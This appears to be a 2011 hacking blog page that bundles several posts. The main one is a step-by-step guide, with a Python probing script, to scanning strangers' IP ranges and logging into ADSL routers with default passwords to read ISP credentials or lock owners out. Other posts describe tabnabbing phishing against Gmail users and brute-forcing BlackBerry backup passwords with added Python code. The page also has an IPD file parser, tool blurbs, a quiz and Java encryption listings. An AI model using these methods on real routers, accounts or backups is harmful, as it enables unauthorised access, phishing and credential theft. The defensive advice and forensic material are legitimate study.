
Tuesday, January 11, 2011

How to Hack an Ethernet ADSL Router

A large share of home Internet users connect through an ADSL router/modem, and many of those devices are still reachable with the credentials they left the factory with. This post shows how that weakness is found and used to reach the router's settings page and the ISP login details stored on it.
Every router ships with an administrative username and password that unlock its settings. The weakness is not a software bug but the default credentials themselves: routers usually arrive preconfigured by the Internet Service Provider, and most users never change the password afterwards. When the management interface also answers on the router's public (WAN) address, anyone on the Internet can try the common vendor defaults against it. Here is how it is done.
Before you proceed, you need the following tool:
Angry IP Scanner
Here is a detailed information on how to exploit the vulnerability of an ADSL router.
Step-1: Go to www.whatismyipaddress.com. The page shows your public IP address; note it down.
Step-2: Open Angry IP Scanner. In the IP Range field, enter the range of addresses to scan.
Suppose your IP is 117.192.195.101. A range such as 117.192.194.0 to 117.192.200.255 covers seven /24 blocks, roughly 1,800 addresses, which is plenty to work with.
 
Step-3: Go to Tools->Preferences and select the Ports tab. Under Port selection enter 80 (we need to scan for port 80). Now switch to the Display tab, select the option “Hosts with open ports only” and click on OK.
IP Scanner
I have used Angry IP Scanner v3.0 beta-4. If you are using a different version, you need to Go to Options instead of Tools
 
Step-4: Now click on Start. After a few minutes, the IP scanner will show a list of IPs with Port 80 open as shown in the below image.
IP Scanner
 
Step-5: Copy one of the IPs from the list, paste it into your browser's address bar and press Enter. If a router's management interface is listening on port 80, the browser shows a login prompt asking for a username and password. Since most users never change the factory credentials, the vendor default is likely to work. Common defaults are admin/admin and admin/password; the exact pair depends on the vendor and model.
Enter the username and password and press Enter. If the default is still in place you land on the router settings page, where any setting can be modified. The layout of the settings page varies from router to router; a sample is shown below.
Router Settings Page
 
If the default pair is rejected, pick another IP from the list and repeat step 5. Not every host will accept a default password, but in the author's experience a noticeable share of the routers found this way still do.
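The same probe, written as a self-check you can run against your own router's public address. This is an added Python example, not part of the original post: probe() sends a plain GET to port 80, check_default_credentials() recognises the HTTP Basic challenge a management interface returns and then tries the default pairs named above. FakeRouter, start_fake_router and the realm string are constructed stand-ins for a real device so the example runs offline; replace the loopback address with the address of a router you own.

```python
import base64
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

# The factory defaults the post names; extend with your vendor's documented pair.
DEFAULT_PAIRS = [("admin", "admin"), ("admin", "password")]


def basic_auth_header(user: str, password: str) -> str:
    """HTTP Basic is just base64("user:password"); this is what the browser sends
    after the login pop-up in step 5."""
    token = base64.b64encode(f"{user}:{password}".encode("utf-8")).decode("ascii")
    return "Basic " + token


def probe(host: str, port: int, user=None, password=None, timeout: float = 5.0):
    """GET / on the host, optionally with credentials. Returns (status, WWW-Authenticate)."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    headers = {}
    if user is not None:
        headers["Authorization"] = basic_auth_header(user, password)
    try:
        conn.request("GET", "/", headers=headers)
        resp = conn.getresponse()
        resp.read()
        return resp.status, resp.getheader("WWW-Authenticate")
    finally:
        conn.close()


def check_default_credentials(host: str, port: int = 80, pairs=DEFAULT_PAIRS):
    """Audit one host. Returns "unreachable", "no_auth" (settings page needs no login),
    "not_basic" (something else on port 80), a (user, password) tuple that was
    accepted, or None when every default pair was rejected."""
    try:
        status, challenge = probe(host, port)
    except OSError:
        return "unreachable"
    if status == 200:
        return "no_auth"
    if status != 401 or not challenge or not challenge.lower().startswith("basic"):
        return "not_basic"
    for user, password in pairs:
        status, _ = probe(host, port, user, password)
        if status == 200:
            return (user, password)
    return None


class FakeRouter(BaseHTTPRequestHandler):
    """Constructed stand-in for a router's admin page: one accepted pair, Basic auth."""
    realm = "DSL Router"                 # assumed realm string, not a real product's
    accepted = ("admin", "admin")

    def do_GET(self):
        if self.headers.get("Authorization") == basic_auth_header(*self.accepted):
            body = b"<html><title>Router settings</title></html>"
            self.send_response(200)
        else:
            body = b"Unauthorized"
            self.send_response(401)
            self.send_header("WWW-Authenticate", f'Basic realm="{self.realm}"')
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):        # keep the example output quiet
        pass


def start_fake_router(accepted=("admin", "admin")) -> HTTPServer:
    """Serve FakeRouter on 127.0.0.1 on a free port in a background thread."""
    handler = type("Handler", (FakeRouter,), {"accepted": accepted})
    server = HTTPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


if __name__ == "__main__":
    srv = start_fake_router()
    print(check_default_credentials("127.0.0.1", srv.server_port))   # ('admin', 'admin')
    srv.shutdown()
    srv.server_close()
```

A result of "no_auth" is worse than an accepted default pair: the settings page is open to anyone who finds the address. Either result means the management interface should not be answering on the public side at all.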
 

What can an Attacker do by Gaining Access to the Router Settings?

With access to the settings page an attacker can change any router setting. Altering the connection settings or the administrative password locks the owner out and takes their computer offline until the router is reconfigured. Worse, the ISP login details (the PPPoE username and password the router uses to connect) can be read from the settings and used to piggy-back on the victim's Internet account, and any other setting can be tampered with as a prank. Either way the victim has to reconfigure the router to get it working again.
 

The Verdict:

If you connect through an ADSL router, change its administrative password now, before someone else finds it with a scan like the one above. Changing the password is the minimum: the scan works only because the management interface answers on the public IP, so also disable remote (WAN-side) management if the router offers that option, leaving the settings page reachable from the LAN only.
Since the configuration varies from router to router, contact your ISP or check the vendor manual for how to change the password and disable remote management on your model.



Warning!
All the information in this post is provided for educational purposes only. Do not use it for illegal purposes.

Matriux - Another powerful distribution

Another security distribution bundling powerful free and open-source tools for penetration testing, ethical hacking, system administration, information systems forensics, security testing and more.
Tools included in this distro are:
- Reconnaissance
- DNS
+ HTTrack
- Scanning
- BATMAN-Tools
- Cisco
- Routing-Protocols
- Web-Scanners
- Gain Access (Attack Tools)
- Brute-Force
- Password
- Framework
- Fast-Track
- Inguma
- Metasploit Framework 2
- Metasploit Framework 3
- Radio
- Bluetooth
- Wireless 802.11
- Digital-Forensics
- Acquisition
- Analysis
- Debugger
- Tracer
- Leak-Tracer

Darkjumper- Web vulnerability checker

This tool finds every website hosted on the same server as your target, then runs its vulnerability checks against each of those sites.

Get Darkjumper 5.8 here

Tabnabbing: A New Type of Phishing Attack

The web is a generative and wild place. Sometimes I think I missed my calling; being devious is so much fun. Too bad my parents brought me up with scruples.
Most phishing attacks depend on an original deception. If you detect that you are at the wrong URL, or that something is amiss on a page, the chase is up. You’ve escaped the attackers. In fact, the time that wary people are most wary is exactly when they first navigate to a site.
What we don’t expect is that a page we’ve been looking at will change behind our backs, when we aren’t looking. That’ll catch us by surprise.

How The Attack Works

  1. A user navigates to your normal looking site.
  2. You detect when the page has lost its focus and hasn’t been interacted with for a while.
  3. Replace the favicon with the Gmail favicon, the title with "Gmail: Email from Google", and the page with a Gmail login look-alike. This can all be done with a little bit of JavaScript and takes place instantly.
  4. As the user scans their many open tabs, the favicon and title act as a strong visual cue—memory is malleable and moldable and the user will most likely simply think they left a Gmail tab open. When they click back to the fake Gmail tab, they’ll see the standard Gmail login page, assume they’ve been logged out, and provide their credentials to log in. The attack preys on the perceived immutability of tabs.
  5. After the user has entered their login information and you’ve sent it back to your server, you redirect them to Gmail. Because they were never logged out in the first place, it will appear as if the login was successful.

Smartphone Forensics: Cracking BlackBerry Backup Passwords



BlackBerry dominates the North American smartphone market with almost 40 per cent market share, and a 20 per cent worldwide share isn't bad either. The total subscriber base for the BlackBerry platform exceeds 50 million users.
Today we are proud to present the world's first tool to facilitate forensic analysis of BlackBerry devices by enabling access to protected data stored on users' BlackBerries.
One of the reasons for BlackBerry's popularity is its reputation for security. It was the only commercial mobile communication device ever allowed to a US president: Barack Obama won the privilege of keeping his prized BlackBerry despite resistance from the NSA. (On a similar note, Russian president Dmitry Medvedev was handed an iPhone 4 a day before its official release by none other than Steve Jobs himself. No worries, we crack those, too.)



All data transmitted between a BlackBerry Enterprise Server and BlackBerry smartphones is encrypted with AES or Triple DES. Unique private encryption keys are generated in a secure, mutually authenticated exchange and assigned to each BlackBerry smartphone user. Moreover, to secure information stored on the smartphone, password authentication can be made mandatory through BlackBerry Enterprise Server policies (by default, password authentication is limited to ten attempts, after which the smartphone is wiped and all its contents erased). Local encryption of all data, including messages, address book and calendar entries, memos and tasks, is also available and can likewise be enforced via IT policy. The bundled Password Keeper stores password entries under AES encryption, so users can keep online banking passwords, PIN codes and financial information handy and protected. If that's not enough, system administrators can send wireless commands to remotely change device passwords, lock devices, or delete information from lost or stolen BlackBerries.
Sounds pretty secure, doesn't it? As always, there is a weakest link, and for BlackBerry it is the offline backup mechanism.
Backups are good. If you don't do backups yet, you definitely should. Any decent IT policy mandates backing up data at set intervals, and that is true not only for laptops, desktops and servers but also for mobile devices and smartphones. A lost BlackBerry can ruin your day if no recent backup is at hand: how long would it take to get everything back on a new device? Count contacts, appointments, mail accounts and their settings, installed applications, photos, device preferences, and so on. A backup reduces that to a few minutes.
Backups are also evil. They create a second copy of information that may be private or sensitive. That information is easy to manage while it stays inside a secure device and can be a nightmare to manage once it is outside. Backup encryption is supposed to solve the problem. If you are one of those guys with search warrants, I doubt you like the idea of encrypting anything, BlackBerry backups included, at least when the backup isn't your own.
Smartphone manufacturers provide software not only for syncing devices with desktop computers, but also for creating backups. For example, Apple iPhone users have iTunes. For BlackBerries, it is BlackBerry Desktop Software. According to the application manual:
The BlackBerry Desktop Software is designed to link the content and applications on your BlackBerry device with your computer.
You can use the BlackBerry Desktop Software to do the following tasks:
• synchronize your organizer data (calendar entries, contacts, tasks, and memos) and media files (music, pictures, and videos)
• back up and restore your device data
• manage and update your device applications
• transfer your device settings and data to a new BlackBerry device
• use your device as a modem to connect to the Internet from your computer
• manage multiple devices
• charge your device
Creating device backup is quite simple; again, following the manual:
To back up data that is in your built-in media storage, mass storage mode must be turned on.
1. Connect your BlackBerry device to your computer.
2. In the BlackBerry Desktop Software, click [Device] > [Back up].
3. Do one of the following:
• To back up all your device data, click [Full].
• To back up all your device data except for email messages, click [Quick].
• To select which types of device data to back up, click [Custom]. Select the check box next to the data you want to back up.
4. If your device includes built-in media storage and you want to back up data that is stored there, select the [Files saved on my built-in media storage] check box.
5. Do any of the following:
• To change the default name for the backup file, in the File name field, type a new name.
• To encrypt your data, select the [Encrypt backup file] check box. Type a password.
• To save your settings so that you are not prompted to set these options again when you back up your device, select the [Don't ask for these settings again] check box.
6. Click [Back up].
So when you restore the device from a backup, you have to supply the password you entered when creating it (obviously).
Unlike iPhone backups, which consist of many files, a BlackBerry backup is a single file, with an .ipd extension (Windows version of BlackBerry Desktop Software) or .bbb (Mac version). A .bbb file is simply a ZIP archive containing the .ipd file.
Backup encryption uses AES with a 256-bit key. So far, so good. The AES key is derived from the user-supplied password, and this is where the problem arises.
In short, the standard key-derivation function PBKDF2 is used in a very strange way, to say the least. Where Apple uses 2,000 iterations in iOS 3.x and 10,000 in iOS 4.x, BlackBerry uses only one. The iteration count is the only thing that makes PBKDF2 expensive for an attacker; with a single iteration each password guess costs no more than a couple of HMAC computations, so the KDF does nothing to slow guessing down. Another significant shortcoming is that it is the BlackBerry Desktop Software, not the device, that encrypts the data, so the data travels from the device to the computer unencrypted. Apple devices behave differently: the data is encrypted on the device and never leaves it in plain form, and iTunes only stores the backup, never encrypting or decrypting it. This is surprising given the BlackBerry platform's reputation for security; we expected BlackBerry backup protection to be at least as strong as Apple's, which turned out not to be the case.
What does that mean for us? We can run password recovery attacks on BlackBerry backups really fast: even without GPU acceleration we can try millions of passwords per second. Here is the performance chart:

In case these numbers don't give you much of a hint, here is the tip: a 7-character password (a typical length) that contains only lowercase letters, or only capitals, takes about half an hour to recover on an Intel Core i7 CPU. Even a 7-character password mixing uppercase and lowercase letters falls in under three days.
Longer passwords of course take longer, but the big question is: can you memorize a longer password, or will you write it down?
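The effect of the iteration count, as an added Python example (not Elcomsoft's code and not the real BlackBerry backup format: the SALT value, the HMAC-SHA1 PRF and comparing derived keys directly instead of test-decrypting the backup are assumptions chosen for illustration; only the iteration counts and the 256-bit key length come from the text). single_hmac_block() shows what PBKDF2 degenerates to at one iteration, recover_password() is the offline guessing loop, and keyspace_size() lets you redo the half-hour estimate for your own CPU.

```python
import hashlib
import hmac
import itertools
import string
import struct
import time
from typing import Iterable, Optional, Tuple

KEY_LEN = 32                    # 256-bit AES key, as the text states
SALT = b"constructed-salt"      # assumed: the real salt is not given in the text


def derive_key(password: str, salt: bytes, iterations: int) -> bytes:
    """PBKDF2 with HMAC-SHA1 as the PRF (assumed). `iterations` is the parameter the
    text criticises: Apple uses 2,000 or 10,000, BlackBerry 1."""
    return hashlib.pbkdf2_hmac("sha1", password.encode("utf-8"), salt, iterations, KEY_LEN)


def single_hmac_block(password: str, salt: bytes, block_index: int) -> bytes:
    """With c = 1 every PBKDF2 output block T_i collapses to one HMAC(P, S || INT_32BE(i)),
    so a guess costs the attacker two HMAC calls for a 32-byte key."""
    msg = salt + struct.pack(">I", block_index)
    return hmac.new(password.encode("utf-8"), msg, hashlib.sha1).digest()


def recover_password(target_key: bytes, salt: bytes, iterations: int,
                     candidates: Iterable[str]) -> Tuple[Optional[str], int]:
    """Offline guessing: derive a key per candidate and compare with the key that
    opens the backup. Returns (password or None, number of guesses made)."""
    tried = 0
    for cand in candidates:
        tried += 1
        if hmac.compare_digest(derive_key(cand, salt, iterations), target_key):
            return cand, tried
    return None, tried


def lowercase_passwords(length: int) -> Iterable[str]:
    """Every lowercase password of the given length in order (26**length of them)."""
    for chars in itertools.product(string.ascii_lowercase, repeat=length):
        yield "".join(chars)


def keyspace_size(alphabet_size: int, length: int) -> int:
    """Number of candidates for a fixed-length password over the given alphabet."""
    return alphabet_size ** length


def guesses_per_second(iterations: int, sample: int) -> float:
    """Measured single-core rate of derive_key() at a given iteration count."""
    start = time.perf_counter()
    for i in range(sample):
        derive_key(f"cand{i}", SALT, iterations)
    return sample / (time.perf_counter() - start)


if __name__ == "__main__":
    backup_key = derive_key("dog", SALT, 1)      # what the attacker holds once the backup is parsed
    print(recover_password(backup_key, SALT, 1, lowercase_passwords(3)))   # ('dog', 2399)
    rate_1 = guesses_per_second(1, 20000)
    rate_10k = guesses_per_second(10000, 200)
    print(f"c=1: {rate_1:,.0f} guesses/s   c=10000: {rate_10k:,.0f} guesses/s")
    for alphabet, label in ((26, "lowercase only"), (52, "mixed case")):
        hours = keyspace_size(alphabet, 7) / rate_1 / 3600
        print(f"7 chars, {label}: {hours:.1f} hours to exhaust at c=1 on this core")
```

The measured ratio between the two rates is roughly the iteration count itself: that factor, which Apple's 10,000 iterations buys and BlackBerry's single iteration gives away, is the whole difference between a half-hour search and a multi-month one.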
Sorry, forgot to mention. To recover BlackBerry backup passwords you need our Elcomsoft Phone Password Breaker (formerly "Elcomsoft iPhone Password Breaker"; sorry Apple, we dropped the 'i' because the tool now supports not only iPhone backups but your competitors' too. The abbreviation remains EPPB for the time being).
And now some quick tips. First, brute force is not the only attack available: a dictionary attack (our favourite, especially with permutations) is there as well.
Second, once the password is recovered (or if you already know it), EPPB can decrypt the backup so that you can restore the device from it or analyze its contents with any third-party mobile forensic tool such as ABC Amber BlackBerry Converter.


By : Vladimir Katalov

Scapy

Scapy is a powerful interactive packet manipulation program. It can forge or decode packets of a wide number of protocols, send them on the wire, capture them, match requests and replies, and much more. It easily handles most classical tasks such as scanning, tracerouting, probing, unit tests, attacks and network discovery (it can replace hping, 85% of nmap, arpspoof, arp-sk, arping, tcpdump, tethereal, p0f, etc.). It also performs very well at many specific tasks most other tools can't handle, such as sending invalid frames, injecting your own 802.11 frames, and combining techniques (VLAN hopping plus ARP cache poisoning, VoIP decoding on a WEP-encrypted channel, and so on).

 Get Scapy 2.1.1 here

BlackBerry IPD Files

IPD Files Demystified
BlackBerry handhelds have long been a favourite of the corporate executive, but with the release of a more mainstream, multimedia-capable device in the Pearl and an aggressive advertising campaign, the BlackBerry is bound to become popular with non-corporate users as well.
This mini white paper describes the structure of the BlackBerry backup, or IPD, file for the forensic examiner.
The IPD: what is it?
BlackBerry Desktop Software creates a proprietary backup of the databases on the BlackBerry handheld. By default the file is named
Backup-(current date, time and year)-.ipd
and saved in the user's "My Documents" folder; both the name and the location can be changed by the user. The IPD file itself is a database of databases.
IPD STRUCTURE
Below is a graphic of the IPD file.

As the graphic shows, the IPD file begins with the ASCII string Inter@ctive Pager Backup/Restore File. The examiner may find this useful as a search string for locating IPD files in unallocated space or under other names.
Following this header the structure continues as shown in the graphic below.

Here we see a one-byte line feed (0x0A), a one-byte version (0x02) and a two-byte count of the databases in the file (0x3F, i.e. 63, in the example above).
Finally, the names of the databases follow after a one-byte separator (0x00).
DATABASE NAME STRUCTURE
The database name blocks are laid out as follows:
  • Database name length: 2 bytes; the length includes the terminating null
  • Database name: as many bytes as the length above
This is illustrated in the following graphic

After the name blocks, each database record follows this structure:
  • Database ID: 2 bytes; zero-based position of the database in the list of name blocks
  • Record length: 4 bytes
  • Database version: 1 byte
  • DatabaseRecordHandler: 2 bytes
  • Record unique ID: 4 bytes
  • Field length #1: 2 bytes
  • Field type #1: 1 byte
  • Field data #1: as long as the field length
  • Field length #m: 2 bytes
  • Field type #m: 1 byte
  • Field data #m: as long as the field length
Each record names its database by ID, followed by the record length, the database version, the handler and the record's unique ID. A record then carries a variable number of fields (field #1 to field #m in the table), each a length, type and data triplet.
This is illustrated in the below graphic

This short white paper has described the structure of the BlackBerry backup file commonly known as the IPD file. An IPD file can be loaded into a BlackBerry simulator or third-party software such as ABC Amber BlackBerry Converter to extract evidence. Examiners are encouraged to do their own research and validation of the format.
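A parser for the layout described above, added here as an example for the examiner (it is not code from the white paper or from RIM). Three details the paper leaves open are assumptions in the code: the database count is read big-endian, every other integer little-endian, and "record length" is taken to cover the bytes after it (version, handler, UID and fields). build_ipd() serialises constructed sample data in the same layout so the example runs without a real backup; parse_ipd() walks the header, the name blocks and the records with bounds checks so a truncated file raises instead of yielding nonsense.

```python
import struct
from typing import Dict, List, Sequence, Tuple

HEADER = b"Inter@ctive Pager Backup/Restore File"

Field = Tuple[int, bytes]                               # (field type, field data)
Record = Tuple[int, int, int, int, Sequence[Field]]     # (db_id, db_version, handler, uid, fields)


def build_ipd(db_names: Sequence[str], records: Sequence[Record], version: int = 2) -> bytes:
    """Serialise databases and records in the layout the paper describes (used here to
    construct sample input; it is not how BlackBerry Desktop Software writes files)."""
    out = bytearray(HEADER + b"\x0a" + bytes([version])
                    + struct.pack(">H", len(db_names)) + b"\x00")   # count big-endian: assumed
    for name in db_names:
        raw = name.encode("latin-1") + b"\x00"                 # length includes the terminating null
        out += struct.pack("<H", len(raw)) + raw
    for db_id, db_version, handler, uid, fields in records:
        body = bytearray(struct.pack("<BHI", db_version, handler, uid))
        for ftype, data in fields:
            body += struct.pack("<HB", len(data), ftype) + data
        out += struct.pack("<HI", db_id, len(body)) + body     # record length = bytes after it: assumed
    return bytes(out)


def _need(blob: bytes, pos: int, n: int, what: str) -> None:
    """Bounds check so a truncated or corrupt file raises instead of mis-parsing."""
    if pos + n > len(blob):
        raise ValueError(f"truncated {what} at offset {pos}")


def parse_ipd(blob: bytes) -> Dict:
    """Header, then db_count name blocks, then records until end of file."""
    if not blob.startswith(HEADER):
        raise ValueError("not an IPD file: header string missing")
    pos = len(HEADER)
    _need(blob, pos, 5, "file header")
    if blob[pos] != 0x0A:
        raise ValueError("expected 0x0A line feed after header")
    version = blob[pos + 1]
    db_count = struct.unpack_from(">H", blob, pos + 2)[0]
    if blob[pos + 4] != 0x00:
        raise ValueError("expected 0x00 separator before database names")
    pos += 5

    names: List[str] = []
    for _ in range(db_count):
        _need(blob, pos, 2, "database name length")
        n = struct.unpack_from("<H", blob, pos)[0]
        pos += 2
        _need(blob, pos, n, "database name")
        names.append(blob[pos:pos + n].rstrip(b"\x00").decode("latin-1"))
        pos += n

    records: List[Dict] = []
    while pos < len(blob):
        _need(blob, pos, 6, "record header")
        db_id, rec_len = struct.unpack_from("<HI", blob, pos)
        pos += 6
        _need(blob, pos, rec_len, "record body")
        if rec_len < 7 or db_id >= len(names):
            raise ValueError(f"corrupt record at offset {pos - 6}")
        end = pos + rec_len
        db_version, handler, uid = struct.unpack_from("<BHI", blob, pos)
        pos += 7
        fields: List[Field] = []
        while pos < end:                                   # fields run to the end of the record
            if pos + 3 > end:
                raise ValueError(f"truncated field header at offset {pos}")
            flen, ftype = struct.unpack_from("<HB", blob, pos)
            pos += 3
            if pos + flen > end:
                raise ValueError(f"field runs past its record at offset {pos}")
            fields.append((ftype, blob[pos:pos + flen]))
            pos += flen
        records.append({"db_id": db_id, "db_name": names[db_id], "db_version": db_version,
                        "handler": handler, "uid": uid, "fields": fields})
    return {"version": version, "databases": names, "records": records}


if __name__ == "__main__":
    # Constructed sample: two databases and three records, not a real backup.
    sample = build_ipd(["Address Book", "Memos"], [
        (0, 1, 0x0100, 42, [(1, b"Alice Example"), (2, b"555-0100")]),
        (0, 1, 0x0100, 43, [(1, b"Bob Example")]),
        (1, 1, 0x0200, 7, [(0, b"meeting notes")]),
    ])
    for rec in parse_ipd(sample)["records"]:
        print(rec["db_name"], rec["uid"], [d.decode("latin-1") for _, d in rec["fields"]])
```

Validate the endianness assumptions against a backup from a real device before relying on the output: if the database count or the name lengths come out absurd, flip the byte order in the two struct formats and re-run.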
CITATIONS
1. http://www.BlackBerry.com/developers/journal/jan_2006/ipd_file_format.shtm

General Studies


  • India's three largest wheat-producing states: Uttar Pradesh > Punjab > Haryana
  • World's largest irrigated area: India > China
  • On which date is your shadow shortest at noon: 22 June
  • Carbon content of stainless steel: 0.25%
  • Gas released from paddy fields: methane
  • Father of the White Revolution in India: Verghese Kurien
  • Lachhu Maharaj: Kathak
  • Girija Devi: classical vocal music
  • Pandit Ravi Shankar: sitar
  • Kishan Maharaj: tabla
  • Amjad Ali Khan: sarod
  • Shivkumar Sharma: santoor
  • Vilayat Khan: sitar
  • Hariprasad Chaurasia: flute (bansuri)
  • Indian philosophy is known as the Shad-darshana (six schools): Samkhya - Kapila, Yoga - Patanjali, Nyaya - Gautama, Vaisheshika - Kanada, Mimamsa - Jaimini, Vedanta - Bhagavad Gita



RSA & AES in JAVA

    Listing 1. RSA Key Generator
    import java.io.FileOutputStream;
    import java.io.IOException;
    import java.io.ObjectOutputStream;
    import java.security.GeneralSecurityException;
    import java.security.KeyPair;
    import java.security.KeyPairGenerator;
    import java.security.SecureRandom;
    public class RSAKeyGenerator {
        // 8192-bit RSA is far beyond the usual 2048-4096 bits and takes minutes to
        // generate; kept as in the original listing.
        private static final int KEYSIZE = 8192;
        public static void main(String[] args) {
            generateKey("RSA_private.key", "RSA_public.key");
        }
        // Stores both keys as serialized Java objects. Listing 4 shows the alternative
        // of storing getEncoded() bytes, which avoids Java deserialization on load.
        public static void generateKey(String privateKey, String publicKey) {
            try {
                KeyPairGenerator pairgen = KeyPairGenerator.getInstance("RSA");
                SecureRandom random = new SecureRandom();
                pairgen.initialize(KEYSIZE, random);
                KeyPair keyPair = pairgen.generateKeyPair();
                try (ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream(publicKey))) {
                    out.writeObject(keyPair.getPublic());
                }
                try (ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream(privateKey))) {
                    out.writeObject(keyPair.getPrivate());
                }
            } catch (IOException e) {
                System.err.println(e);
            } catch (GeneralSecurityException e) {
                System.err.println(e);
            }
        }
    }




    Listing 2. Encryption Method
    import java.io.DataInputStream;
    import java.io.DataOutputStream;
    import java.io.FileInputStream;
    import java.io.FileNotFoundException;
    import java.io.FileOutputStream;
    import java.io.IOException;
    import java.io.InputStream;
    import java.io.ObjectInputStream;
    import java.io.OutputStream;
    import java.security.GeneralSecurityException;
    import java.security.Key;
    import java.security.SecureRandom;
    import javax.crypto.Cipher;
    import javax.crypto.KeyGenerator;
    import javax.crypto.SecretKey;
    public class HybridFileCipher {
        // Hybrid scheme: a fresh AES key encrypts the file, the RSA public key wraps the
        // AES key, and the output file is [wrapped key length][wrapped key][AES ciphertext].
        public void encryptToOutputFile(String publicKeyFile, String inputFile, String outputFile)
                throws FileNotFoundException, IOException, ClassNotFoundException, GeneralSecurityException {
            KeyGenerator keygen = KeyGenerator.getInstance("AES");
            SecureRandom random = new SecureRandom();
            keygen.init(random); // provider default key size (128 bits); keygen.init(256, random) for AES-256
            SecretKey key = keygen.generateKey();
            // Wrap with public key
            ObjectInputStream keyIn = new ObjectInputStream(new FileInputStream(publicKeyFile));
            Key publicKey = (Key) keyIn.readObject();
            keyIn.close();
            // "RSA" alone resolves to RSA/ECB/PKCS1Padding; OAEP padding is the stronger choice
            Cipher cipher = Cipher.getInstance("RSA");
            cipher.init(Cipher.WRAP_MODE, publicKey);
            byte[] wrappedKey = cipher.wrap(key);
            DataOutputStream out = new DataOutputStream(new FileOutputStream(outputFile));
            out.writeInt(wrappedKey.length);
            out.write(wrappedKey);
            InputStream in = new FileInputStream(inputFile);
            // "AES" alone resolves to AES/ECB/PKCS5Padding, which leaks repeated plaintext
            // blocks; an authenticated mode such as AES/GCM/NoPadding with a random IV is preferable
            cipher = Cipher.getInstance("AES");
            cipher.init(Cipher.ENCRYPT_MODE, key);
            crypt(in, out, cipher);
            in.close();
            out.close();
        }

    Listing 3. Decryption Method
        // (continues the HybridFileCipher class from Listing 2)
        public void decryptFromOutputFile(String privateKeyFile, String inputFile, String outputFile)
                throws IOException, ClassNotFoundException, GeneralSecurityException {
            DataInputStream in = new DataInputStream(new FileInputStream(inputFile));
            int length = in.readInt();
            byte[] wrappedKey = new byte[length];
            in.readFully(wrappedKey); // read() may return fewer bytes than requested
            // Open with private key
            ObjectInputStream keyIn = new ObjectInputStream(new FileInputStream(privateKeyFile));
            Key privateKey = (Key) keyIn.readObject();
            keyIn.close();
            Cipher cipher = Cipher.getInstance("RSA");
            cipher.init(Cipher.UNWRAP_MODE, privateKey);
            Key key = cipher.unwrap(wrappedKey, "AES", Cipher.SECRET_KEY);
            OutputStream out = new FileOutputStream(outputFile);
            cipher = Cipher.getInstance("AES");
            cipher.init(Cipher.DECRYPT_MODE, key);
            crypt(in, out, cipher);
            in.close();
            out.close();
        }
        // Streams in through the cipher to out; both listings call this helper without defining it.
        private static void crypt(InputStream in, OutputStream out, Cipher cipher)
                throws IOException, GeneralSecurityException {
            byte[] inBytes = new byte[4096];
            int count;
            while ((count = in.read(inBytes)) != -1) {
                byte[] outBytes = cipher.update(inBytes, 0, count);
                if (outBytes != null) {
                    out.write(outBytes);
                }
            }
            out.write(cipher.doFinal()); // flushes the final padded block
        }
    }



    Listing 4. Key File Transformer
    import java.io.FileInputStream;
    import java.io.FileNotFoundException;
    import java.io.IOException;
    import java.io.ObjectInputStream;
    import java.security.GeneralSecurityException;
    import java.security.Key;
    /*
     * Private/Public Key File to Encoded Key Byte[]
     * Reads a serialized key written by Listing 1 and dumps its getEncoded() form
     * (PKCS#8 for a private key, X.509 SubjectPublicKeyInfo for a public key) as a
     * Java byte[] literal that Listings 8 and 9 can turn back into a Key.
     */
    public class KeyToByteArray {
        public static void main(String[] args) throws FileNotFoundException, IOException,
                ClassNotFoundException, GeneralSecurityException {
            ObjectInputStream keyIn = new ObjectInputStream(new FileInputStream("RSA_private.key"));
            Key privateKey = (Key) keyIn.readObject();
            keyIn.close();
            byte[] k = privateKey.getEncoded();
            System.out.println(privateKey.getFormat()); // "PKCS#8" for a private key
            System.out.println(k.length);
            for (int i = 0; i < k.length; i++) {
                System.out.print(k[i]);
            }
            System.out.println();
            System.out.println("Created byte[] of length : " + k.length);
            System.out.println("Convert byte[] to String : " + bytesToHex(k));
            System.out.println("---------------------------------");
            System.out.println();
            // Emit the key as a byte[] initializer, six bytes per line
            System.out.print("byte[] encPKe = { ");
            int j = 0;
            for (int i = 0; i < k.length; i++) {
                if (i == k.length - 1)
                    System.out.print("(byte)0x" + byteToHex(k[i]) + " ");
                else
                    System.out.print("(byte)0x" + byteToHex(k[i]) + ", ");
                j++;
                if (j == 6) {
                    System.out.println();
                    j = 0;
                }
            }
            System.out.println("};");
            System.out.println();
        }
        public static String bytesToHex(byte[] data) {
            StringBuilder buf = new StringBuilder();
            for (int i = 0; i < data.length; i++) {
                buf.append(byteToHex(data[i]).toUpperCase());
            }
            return buf.toString();
        }
        public static String byteToHex(byte data) {
            StringBuilder buf = new StringBuilder();
            buf.append(toHexChar((data >>> 4) & 0x0F));
            buf.append(toHexChar(data & 0x0F));
            return buf.toString();
        }
        public static char toHexChar(int i) {
            if ((0 <= i) && (i <= 9)) {
                return (char) ('0' + i);
            } else {
                return (char) ('a' + (i - 10));
            }
        }
    }




    Listing 5. Modified Encryption Method
    public void encryptWKf(byte[] encPk, String inputFile, String outputFile) throws FileNotFoundException, IOException,
    ClassNotFoundException, GeneralSecurityException { …



    Listing 6. Modified Decryption Method
    public String decryptWKf(byte[] encPk, String inputFile) throws IOException, ClassNotFoundException, GeneralSecurityException { …



    Listing 7. Modified Encryption Method 2
    public void encryptWKf(byte[] encPk, String in, String outputFile) throws FileNotFoundException, IOException,
    ClassNotFoundException, GeneralSecurityException { …



    Listing 8. PKCS8 Key Specifications
    // make a PrivateKey out of the encoded (PKCS#8) private key byte[] from Listing 4
    PKCS8EncodedKeySpec keySpec = new PKCS8EncodedKeySpec(encPk);
    KeyFactory keyFactory = KeyFactory.getInstance("RSA");
    PrivateKey privateKey = keyFactory.generatePrivate(keySpec);




    Listing 9. X509 Key Specifications
    // make a PublicKey out of the encoded (X.509) public key byte[] from Listing 4
    X509EncodedKeySpec keySpec = new X509EncodedKeySpec(encPk);
    KeyFactory keyFactory = KeyFactory.getInstance("RSA");
    PublicKey publicKey = keyFactory.generatePublic(keySpec);


    Source : Hacking Magazine